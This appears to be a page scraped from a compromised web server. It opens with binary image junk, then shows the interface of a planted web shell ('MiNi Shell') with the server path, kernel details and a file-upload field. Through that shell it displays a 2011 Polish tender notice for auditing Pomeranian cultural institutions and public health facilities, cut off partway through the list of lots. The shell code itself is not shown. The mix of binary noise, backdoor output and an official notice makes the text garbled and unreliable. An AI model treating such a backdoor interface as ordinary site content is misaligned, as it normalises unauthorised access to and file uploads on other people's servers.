JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110201/36801-N-2011.html

<p class="kh_header"><b>Gdańsk: Badanie sprawozdań finansowych za 2010 r. instytucji kultury oraz samodzielnych publicznych zakładów opieki zdrowotnej prowadzonych 
i współprowadzonych przez Województwo Pomorskie</b><br>
<b>Numer ogłoszenia: 36801 - 2011; data zamieszczenia: 01.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorząd Województwa Pomorskiego , ul. Okopowa 21/27, 80-810 Gdańsk, woj. pomorskie, tel. 058 3261555, faks 058 3261556.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.woj-pomorskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Badanie sprawozdań finansowych za 2010 r. instytucji kultury oraz samodzielnych publicznych zakładów opieki zdrowotnej prowadzonych 
i współprowadzonych przez Województwo Pomorskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEDMIOT ZAMÓWIENIA OBEJMUJE 21 ZADAŃ (CZĘŚCI).
1.	Przedmiotem zamówienia jest:
1)	przeprowadzenie badania i ocena sprawozdania finansowego za rok 2010 samodzielnych publicznych zakładów opieki zdrowotnej (dalej SPZOZ) oraz instytucji kultury (dalej IK) wybranych zgodnie z art. 64. ust. 1 pkt. 4 ustawy o rachunkowości nadzorowanych przez Samorząd Województwa Pomorskiego, w szczególności:
a.	udział w charakterze obserwatora w inwentaryzacji znaczących składników aktywów trwałych i obrotowych i kontrola jej prawidłowości,
b.	potwierdzenie wiarygodności danych (stwierdzeń), zarówno liczbowych, jak 
i słownych, zawartych w przedłożonych przez SPZOZ oraz IK do badania pełnych sprawozdań finansowych i ich zgodności z zasadami (polityką) rachunkowości, 
w tym:
-	istnienia na dzień bilansowy wykazanych w sprawozdaniu finansowym aktywów 
i pasywów,
-	kompletności ujęcia aktywów, pasywów, operacji gospodarczych oraz innych ujawnianych informacji dotyczących okresu objętego sprawozdaniem finansowym,
-	prawidłowości wyceny aktywów i pasywów,
-	wystąpienia w badanym okresie operacji gospodarczych wykazanych 
w sprawozdaniu finansowym,
-	ujęcia operacji gospodarczych w prawidłowych kwotach i poprawnego przypisania  wynikających z nich przychodów, zysków nadzwyczajnych oraz kosztów i strat nadzwyczajnych do okresu którego dotyczą,
-	prezentacji we właściwych częściach sprawozdania finansowego poszczególnych sald aktywów i pasywów, przychodów i zysków nadzwyczajnych oraz kosztów 
i strat nadzwyczajnych,
c.	ustalenie poprawności bilansu otwarcia w księgach rachunkowych oraz 
w sprawozdaniu finansowym oraz ciągłości zasad (polityki) rachunkowości (jeśli nastąpiły ich zmiany, określenie przyczyn i skutków oraz stwierdzenie ujawnienia tych zmian w badanym sprawozdaniu finansowym),
d.	poddanie badaniu szczegółowemu, w zakresie wiarygodności i zgodności:
-	stanu aktywów trwałych w zakresie: zmniejszenia wartości początkowej środków trwałych oraz stanu środków trwałych w budowie,
-	stanu aktywów obrotowych w zakresie: należności wraz z odpisami aktualizującymi ich wartość, w tym w szczególności należności od Narodowego Fundusz Zdrowia (dalej NFZ) - dotyczy SPZOZ - lub innych jednostek sektora finansów publicznych oraz należności dochodzonych na drodze sądowej, roszczeń spornych i/lub wątpliwych,
-	stanu funduszy własnych w zakresie: funduszu założycielskiego, funduszu zakładu oraz wyniku finansowego z uwzględnieniem korekt z tytułu błędu popełnionego w poprzednich latach obrotowych,
-	stanu zobowiązań i rezerw na zobowiązania w zakresie: rezerw na zobowiązania, zobowiązań publicznoprawnych oraz ZFŚS,
-	pozycji pozostałych przychodów i kosztów operacyjnych w zakresie: utworzonych i rozwiązanych rezerw, odpisów aktualizujących wartość należności (w szczególności od NFZ) i pozostałych odpisów aktualizujących oraz dotacji, dopłat i subwencji, a także ujawnionych w pozostałej działalności operacyjnej nietypowych operacji gospodarczych,
e.	poddanie badaniu wyrywkowemu (w oparciu o ustalone ryzyko badania) pozostałych obszarów nie wymienionych wyżej,
f.	ocena działania systemu finansowo-księgowego, w tym zwłaszcza:
-	ocena dokumentacji systemu przetwarzania danych,
-	ocena funkcjonowania kontroli wewnętrznej,
g.	sporządzenie planu badania (a w tym określenie terminów badania poszczególnych pozycji z oznaczeniem rodzaju badania),
h.	ustalenie poprawności i kompletności poszczególnych pozycji następujących elementów sprawozdania finansowego:
-	wprowadzenia do sprawozdania finansowego,
-	bilansu,
-	pozycji pozabilansowych,
-	rachunku zysków i strat,
-	zestawienia zmian w kapitale (funduszu) własnym,
-	rachunku przepływów pieniężnych,
-	informacji dodatkowych i objaśnień, ze szczególnym uwzględnieniem punktu 5 załącznika nr 1 do ustawy o rachunkowości,
i.	dokonanie analizy finansowej SPZOZ i IK, w tym określenie ewentualnych zagrożeń kontynuacji działalności, 
2)	wyrażenie opinii o prawidłowości i rzetelności sprawozdania finansowego za rok 2010 SPZOZ i IK Samorządowi Województwa Pomorskiego, zgodnie z art. 65 ust. 2-4 ustawy o rachunkowości,
3)	sporządzenie raportu uzupełniającego opinię z badania sprawozdania finansowego 
za rok 2010 SPZOZ i IK nadzorowanych przez Samorząd Województwa Pomorskiego, zgodnie z art. 65 ust. 5 ustawy o rachunkowości, bez względu na rodzaj wydanej opinii,
4)	sporządzenie informacji dla dyrektora SPZOZ i IK nadzorowanych przez Samorząd Województwa Pomorskiego zawierającej spostrzeżenia i sugestie w zakresie funkcjonowania służb finansowo-księgowych, systemu finansowo-księgowego oraz zalecenia pokontrolne,
5)	dane dotyczące przedmiotu zamówienia, dotyczące SPZOZ oraz IK, zawarte zostały 
w Kartach Informacyjnych dla zadań od 1 - 21.
2.	Kod Wspólnego Słownika Zamówień (CPV) 79 21 21 00-4 usługi audytu finansowego
3.	Termin i sposób realizacji zamówienia:
1)	miejscem wykonania prac dotyczących badania sprawozdania finansowego za 2010 rok, które zostały ujęte w harmonogramie pkt 1-30 stanowiącym załącznik nr 1 do umowy, jest wyłącznie siedziba Zleceniodawcy w godzinach pracy służb finansowo-księgowych,
2)	wszelkie dokumenty oraz ich kserokopie pozostają przez cały okres prowadzonego 
badania w siedzibie Zleceniodawcy,
3)	za termin realizacji zamówienia uważa się datę przekazania Zamawiającemu przez Wykonawcę:
	3 egzemplarzy opinii,
	3 egzemplarzy raportu uzupełniającego opinię, 
	1 egzemplarza informacji dla dyrektora SPZOZ / IK, 
	1 egzemplarza planu badania potwierdzonego przez Zleceniodawcę (załącznik nr 1 do Umowy),
	1 egzemplarza protokołu przyjęcia przedmiotu świadczenia potwierdzonego przez Zleceniodawcę (załącznik nr 2 do Umowy),
4)	wymagane terminy realizacji zamówienia w podziale na zadania:
a)	dla zadań nr 1-7  do dnia 29 KWIETNIA  2011 r.,
b)	dla zadań nr 11,12,13 oraz dla zadań 15 -21 do dnia 25 KWIETNIA 2011 r.,
c)	dla zadań nr 8,9,10,14 do dnia 12 MAJA 2011 r.,
5)	Termin i warunki płatności zostały określone we wzorze umowy- załącznik nr 4 do SIWZ.
Dopuszcza się składanie wyłącznie ofert częściowych. W rozumieniu Zamawiającego 1 część stanowi 1 ZADANIE.
-	Wykonawcy mogą składać wyłącznie ofertę na maksymalnie 5 zadań (części) wymienionych w  załączniku nr 1. 
-	Wykonawca nie może złożyć oferty na więcej niż 5 zadań (części)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 21.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.	W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału 
w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, dotyczące:
1.1	posiadania  uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek ich posiadania;
Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że:
a)	znajduje się na liście podmiotów uprawnionych do badania sprawozdań finansowych, prowadzonej przez Krajową Radę Biegłych Rewidentów.

Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie dokumentów 
i oświadczenia, przedłożonych przez Wykonawcę wraz z ofertą i wyszczególnionych w SIWZ, na zasadzie kwalifikacji spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że:
b)	posiada doświadczenie w zakresie badania sprawozdań finansowych SPZOZ 
(dla zadań 8-21) lub IK (dla zadań 1-7) potwierdzone wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej dwóch usług badania sprawozdań finansowych dla SPZOZ (dla zadań 8-21) lub IK (dla zadań 
1-7).
Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie dokumentów 
i oświadczenia, przedłożonych przez Wykonawcę wraz z ofertą i wyszczególnionych w SIWZ, na zasadzie kwalifikacji spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że:
c)	dysponuje co najmniej 2 osobami posiadającymi tytuł biegłego rewidenta wpisanymi do rejestru biegłych rewidentów, prowadzonego przez Krajową Radę Biegłych Rewidentów, zgodnie z Ustawą z dnia 7 maja 2009 r. o biegłych rewidentach i ich samorządzie, podmiotach uprawnionych do badania sprawozdań finansowych oraz o nadzorze publicznym (Dz. U. 77 poz. 649), posiadającymi doświadczenie przy badaniu sprawozdań finansowych co najmniej dwóch SPZOZ (dla zadań 8-21) lub dwóch IK (dla zadań 1-7) lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia w/w osób do wykonania zamówienia;
Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie dokumentów i oświadczenia, przedłożonych przez Wykonawcę wraz z ofertą i wyszczególnionych w SIWZ, na zasadzie kwalifikacji spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie dokumentów 
i oświadczenia, przedłożonych przez Wykonawcę wraz z ofertą i wyszczególnionych w SIWZ, na zasadzie kwalifikacji spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie dokumentów 
i oświadczenia, przedłożonych przez Wykonawcę wraz z ofertą i wyszczególnionych w SIWZ, na zasadzie kwalifikacji spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
2.	Wykonawcy występujący wspólnie ustanawiają pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
3.	Upoważnienie dla lidera musi być udokumentowane pełnomocnictwem, tj. dokumentem stwierdzającym ustanowienie pełnomocnika podpisanym przez upełnomocnionych przedstawicieli wszystkich pozostałych wykonawców. W zakresie formy, pełnomocnictwo musi odpowiadać przepisom Kodeksu Cywilnego (oryginał lub uwierzytelniony odpis, 
tj. notarialnie potwierdzona kopia).
4.	dokument potwierdzający wpis na listę podmiotów uprawnionych do badania sprawozdań finansowych prowadzoną przez Krajową Izbę Biegłych RewidentóW przypadku wykonawców występujących wspólnie warunek określony w ust. 2 musi spełnić każdy z wykonawców, warunki wskazane w ust. 1.2 mogą być spełnione łącznie.
5. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
w.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>6.	Wszelkie zmiany zawartej umowy będą wymagały pisemnego aneksu i nie mogą dotyczyć jej istotnych postanowień, z zastrzeżeniem ust. 7. 
7.	Zmiany umowy mogą dotyczyć:
1)	terminu realizacji zamówienia,
2)	warunków płatności,
3)	zmiany wynagrodzenia w przypadku zmiany ustawowej stawki podatku VAT.
8.	   Zmiany, o których mowa w ust. 6 pkt 1 i 2 mogą nastąpić jedynie w uzasadnionych
   przypadkach:
a)	w przypadku wystąpienia siły wyższej, tj. katastrofa naturalna, strajk, pożar,  eksplozja, wojna, atak terrorystyczny,
b)	gdy zaistniały okoliczności, których nie można było przewidzieć przy zawarciu umowy (choroba, wypadek) potwierdzone protokołem lub innym dokumentem wystawionym przez stosowne organy,
c)	gdy nastąpiły zmiany przepisów prawnych mających wpływ na badanie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.woj-pomorskie.pl w Biuletynie Informacji Publicznej Zamówienia Publiczne i Ogłoszenia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Pomorskiego w Gdańsku, ul. Okopowa 21-27, pok. 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2011 godzina 10:00, miejsce: Kancelaria Ogólna pok. 8A, Urząd Marszałkowski Województwa Pomorskiego w Gdańsku ul. Okopowa 21-27.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Państwowy Teatr Wybrzeże w Gdańsku
ul. św. Ducha 2	80-834	Gdańsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Teatr Muzyczny im. Danuty Baduszkowej w Gdyni
Plac Grunwaldzki 1		81-372	Gdynia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Państwowa Opera Bałtycka w Gdańsku
Al. Zwycięstwa 15		80-219	Gdańsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Polska Filharmonia Bałtycka im. Fryderyka Chopina w Gdańsku
ul. Ołowianka 1		80-751	Gdańsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Muzeum Narodowe w Gdańsku
ul. Toruńska 1		80-822	Gdańsk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie sprawozdania finansowego sporządzonego na dzień 31 grudnia 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Muzeum Archeologiczne w Gdańsku
ul. Mariacka 25/26		80-958	Gdańsk.</p>
